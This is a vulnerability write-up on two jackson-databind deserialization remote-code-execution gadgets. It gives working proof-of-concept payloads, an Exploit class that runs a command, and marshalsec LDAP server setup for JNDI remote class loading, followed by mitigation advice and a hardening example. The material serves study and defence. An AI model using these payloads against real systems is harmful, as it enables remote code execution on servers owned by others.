CVE-2020-xxxx:Jackson-databind RCE
2025-08-18 17:33:08
Jackson-databind RCE: vulnerability analysis and reproduction
Overview
This post analyses two deserialization remote-code-execution vulnerabilities in jackson-databind (CVE-2020-xxxx). Both rely on gadget classes that were not yet on the blocklist jackson-databind maintains for default typing, so an attacker can name them as a polymorphic type id. Under specific conditions (default typing enabled on an ObjectMapper that reads untrusted JSON, the gadget library on the classpath, and a JDK that still allows remote codebase loading through JNDI) they lead to remote code execution.
First vulnerability
Affected versions
- jackson-databind 2.9.x before 2.9.10.6 (the fix for this gadget shipped in 2.9.10.6; the reproduction environment below uses 2.9.10.4, which is still affected)
- jackson-databind before 2.8.11.6
- jackson-databind before 2.7.9.7
Exploitation conditions
- enableDefaultTyping() is turned on (polymorphic default typing, so the JSON itself may name the class to instantiate), and attacker-controlled JSON reaches that ObjectMapper
- the third-party dependency com.pastdev.httpcomponents.configuration (class JndiConfiguration) is on the classpath
Principle
com.pastdev.httpcomponents.configuration.JndiConfiguration was not on the blocklist that jackson-databind maintained at the time, so it can be supplied as a type id. The class performs a JNDI lookup on an attacker-controlled name; on an older JDK, where JNDI still fetches classes from a remote codebase referenced by an LDAP/RMI server, this results in RCE.
Environment setup
pom.xml dependencies (jackson-databind 2.9.10.4 is still affected; com.pastdev.httpcomponents:configuration supplies the gadget class):
<dependencies>
    <dependency>
        <groupId>com.fasterxml.jackson.core</groupId>
        <artifactId>jackson-databind</artifactId>
        <version>2.9.10.4</version>
    </dependency>
    <dependency>
        <groupId>com.pastdev.httpcomponents</groupId>
        <artifactId>configuration</artifactId>
        <version>0.1.3</version>
    </dependency>
    <dependency>
        <groupId>org.slf4j</groupId>
        <artifactId>slf4j-nop</artifactId>
        <version>1.7.2</version>
    </dependency>
    <dependency>
        <groupId>javax.transaction</groupId>
        <artifactId>jta</artifactId>
        <version>1.1</version>
    </dependency>
</dependencies>
Reproduction steps
- Write Exploit.java and compile it (javac Exploit.java). The static initializer runs as soon as the victim JVM loads the class:
// Exploit.java: executed when the victim JVM loads this class via JNDI
import java.lang.Runtime;
public class Exploit {
    static {
        try {
            Runtime.getRuntime().exec("calc"); // proof of execution on Windows
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
- Serve Exploit.class over HTTP on port 8000 (for example python -m http.server 8000 from the directory containing the class file), so the URL below resolves.
- Start an LDAP reference server with marshalsec on port 1099 that points to the HTTP server:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8000/#Exploit" 1099
- Run the POC:
package com.jacksonTest;
import com.fasterxml.jackson.databind.ObjectMapper;
import java.io.IOException;
public class Poc {
    public static void main(String[] args) throws Exception {
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping(); // the vulnerable setting: any class name is accepted as a type id
        // array form [type id, value]: the bare string is bound to JndiConfiguration's String creator
        String payload = "[\"com.pastdev.httpcomponents.configuration.JndiConfiguration\",\"ldap://127.0.0.1:1099/Exploit\"]";
        try {
            mapper.readValue(payload, Object.class);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}
Analysis
Gadget chain:
mapper.readValue
-> JndiConfiguration (the bare string in the payload is bound to its single-String creator)
-> lookup() on the attacker-controlled JNDI name, which the LDAP server answers with a reference to the remote Exploit class
Related issue: https://github.com/FasterXML/jackson-databind/issues/2798
Second vulnerability
Affected versions
- jackson-databind 2.9.x before 2.9.10.6 (the fix for this gadget shipped in 2.9.10.6; the reproduction environment below uses 2.9.10.4, which is still affected)
- jackson-databind before 2.8.11.6
- jackson-databind before 2.7.9.7
Exploitation conditions
- enableDefaultTyping() is turned on, and attacker-controlled JSON reaches that ObjectMapper
- the third-party dependency Anteros-DBCP (groupId br.com.anteros) is on the classpath
Principle
br.com.anteros.dbcp.AnterosDBCPConfig was not on the blocklist that jackson-databind maintained at the time. The POCs below instantiate the data-source class AnterosDBCPDataSource, which is built on AnterosDBCPConfig; its healthCheckRegistry and metricRegistry setters accept a String and resolve it through a JNDI lookup. On an older JDK that still loads classes from a remote codebase this results in RCE.
Environment setup
pom.xml dependencies (jackson-databind 2.9.10.4 is still affected; Anteros-DBCP supplies the gadget class):
<dependencies>
    <dependency>
        <groupId>com.fasterxml.jackson.core</groupId>
        <artifactId>jackson-databind</artifactId>
        <version>2.9.10.4</version>
    </dependency>
    <dependency>
        <groupId>br.com.anteros</groupId>
        <artifactId>Anteros-DBCP</artifactId>
        <version>1.0.1</version>
    </dependency>
    <dependency>
        <groupId>org.slf4j</groupId>
        <artifactId>slf4j-nop</artifactId>
        <version>1.7.2</version>
    </dependency>
    <dependency>
        <groupId>javax.transaction</groupId>
        <artifactId>jta</artifactId>
        <version>1.1</version>
    </dependency>
</dependencies>
Reproduction
- Prepare Exploit.java, the HTTP server and the marshalsec LDAP server exactly as in the first vulnerability.
- Run POC1 (JNDI name delivered through the healthCheckRegistry setter):
import com.fasterxml.jackson.databind.ObjectMapper;
public class POC {
    public static void main(String[] args) throws Exception {
        // object form [type id, {properties}]: the String value reaches setHealthCheckRegistry
        String payload = "[\"br.com.anteros.dbcp.AnterosDBCPDataSource\",{\"healthCheckRegistry\":\"ldap://127.0.0.1:1099/Exploit\"}]";
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping(); // the vulnerable setting
        mapper.readValue(payload, Object.class);
    }
}
- Run POC2 (same gadget, delivered through the metricRegistry setter):
import com.fasterxml.jackson.databind.ObjectMapper;
public class POC {
    public static void main(String[] args) throws Exception {
        // the String value reaches setMetricRegistry instead
        String payload = "[\"br.com.anteros.dbcp.AnterosDBCPDataSource\",{\"metricRegistry\":\"ldap://127.0.0.1:1099/Exploit\"}]";
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping(); // the vulnerable setting
        mapper.readValue(payload, Object.class);
    }
}
Analysis
Gadget chain:
mapper.readValue
-> AnterosDBCPDataSource.setHealthCheckRegistry (POC1) or AnterosDBCPDataSource.setMetricRegistry (POC2)
-> AnterosDBCPDataSource.getObjectOrPerformJndiLookup (a String argument is treated as a JNDI name)
-> initCtx.lookup() on the attacker-controlled name
Related issue: https://github.com/FasterXML/jackson-databind/issues/2814
Recommendations
- Upgrade jackson-databind to a fixed version (2.9.10.6 or later for these two gadgets). Blocklisting is reactive by nature: each new gadget library needs a new release, so on 2.10+ replace enableDefaultTyping() with activateDefaultTyping(PolymorphicTypeValidator, ...) and an allow-list of your own types.
- Run a JDK at or above 11.0.1, 8u191, 7u201 or 6u211. There com.sun.jndi.ldap.object.trustURLCodebase (and its RMI counterpart) defaults to false, so JNDI refuses to load classes from a remote codebase. This only stops the remote-codebase variant used in these PoCs; JNDI injection through factory classes already present on the classpath is not affected by the JDK version.
- Avoid calling enableDefaultTyping() unless polymorphic deserialization is genuinely required, and never on an ObjectMapper that reads untrusted input.
- Strictly control where deserialized data comes from.
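The following Java program is an added example, not code from the original post, from jackson-databind or from either gadget library. It puts the PoC configuration next to its hardened replacement and shows, offline, why the allow-list stops a gadget that no blocklist has heard of yet. The class names CanaryGadget and Pet, the demo package and the constructed payloads are assumptions made for this illustration; CanaryGadget only records the JNDI name a real gadget would pass to InitialContext.lookup(). It requires jackson-databind 2.10 or later, where PolymorphicTypeValidator was introduced.

```java
package demo;

import com.fasterxml.jackson.core.JsonProcessingException;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.json.JsonMapper;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;

/**
 * Added example (not from the original post or from jackson-databind).
 * Compares the PoC's enableDefaultTyping() with a 2.10+ allow-list validator.
 */
public class DefaultTypingHardening {

    /**
     * Hypothetical gadget standing in for JndiConfiguration / AnterosDBCPConfig:
     * a public setter that receives an attacker-controlled String which a real
     * gadget would hand to new InitialContext().lookup(name). This canary only
     * records the name so the demo runs without any LDAP or HTTP server.
     */
    public static class CanaryGadget {
        public static volatile String lastLookup;

        public void setJndiName(String name) {
            lastLookup = name;
        }
    }

    /** A domain type the application genuinely needs polymorphic handling for. */
    public static class Pet {
        public String name;
    }

    /** The PoC configuration: every class on the classpath is a valid type id. */
    public static ObjectMapper legacyMapper() {
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping(); // deprecated since 2.10 for exactly this reason
        return mapper;
    }

    /**
     * Hardened replacement: only the listed type may appear as a type id.
     * The String-prefix rule is checked against the raw type id before the
     * class is loaded, so an unknown gadget never reaches Class.forName().
     */
    public static ObjectMapper hardenedMapper() {
        PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
                .allowIfSubType(Pet.class.getName())
                .build();
        return JsonMapper.builder()
                .activateDefaultTyping(ptv, ObjectMapper.DefaultTyping.NON_FINAL)
                .build();
    }

    // Constructed payloads in the same [type id, value] array form as the post's PoCs.
    public static final String GADGET_PAYLOAD =
            "[\"" + CanaryGadget.class.getName() + "\",{\"jndiName\":\"ldap://127.0.0.1:1099/Exploit\"}]";
    public static final String PET_PAYLOAD =
            "[\"" + Pet.class.getName() + "\",{\"name\":\"rex\"}]";

    /** True if the mapper instantiated the gadget and ran its setter. */
    public static boolean gadgetReached(ObjectMapper mapper, String payload) {
        CanaryGadget.lastLookup = null;
        try {
            mapper.readValue(payload, Object.class);
        } catch (JsonProcessingException e) {
            // Hardened mapper: InvalidTypeIdException is raised while resolving the
            // type id, before any constructor or setter of the gadget can run.
            return false;
        }
        return CanaryGadget.lastLookup != null;
    }

    public static void main(String[] args) throws Exception {
        System.out.println("legacy mapper reaches gadget:   " + gadgetReached(legacyMapper(), GADGET_PAYLOAD));
        System.out.println("hardened mapper reaches gadget: " + gadgetReached(hardenedMapper(), GADGET_PAYLOAD));
        Pet pet = (Pet) hardenedMapper().readValue(PET_PAYLOAD, Object.class);
        System.out.println("hardened mapper still binds the allowed type: " + pet.name);
    }
}
```

With the legacy mapper the canary's setter is invoked with the ldap:// string, which is the point at which the real gadgets perform their lookup; with the hardened mapper the same payload is rejected at type-id resolution, while the allow-listed Pet still deserializes. Prefer name-based rules (String prefix or Pattern) over Class-based ones so that denied classes are never even loaded.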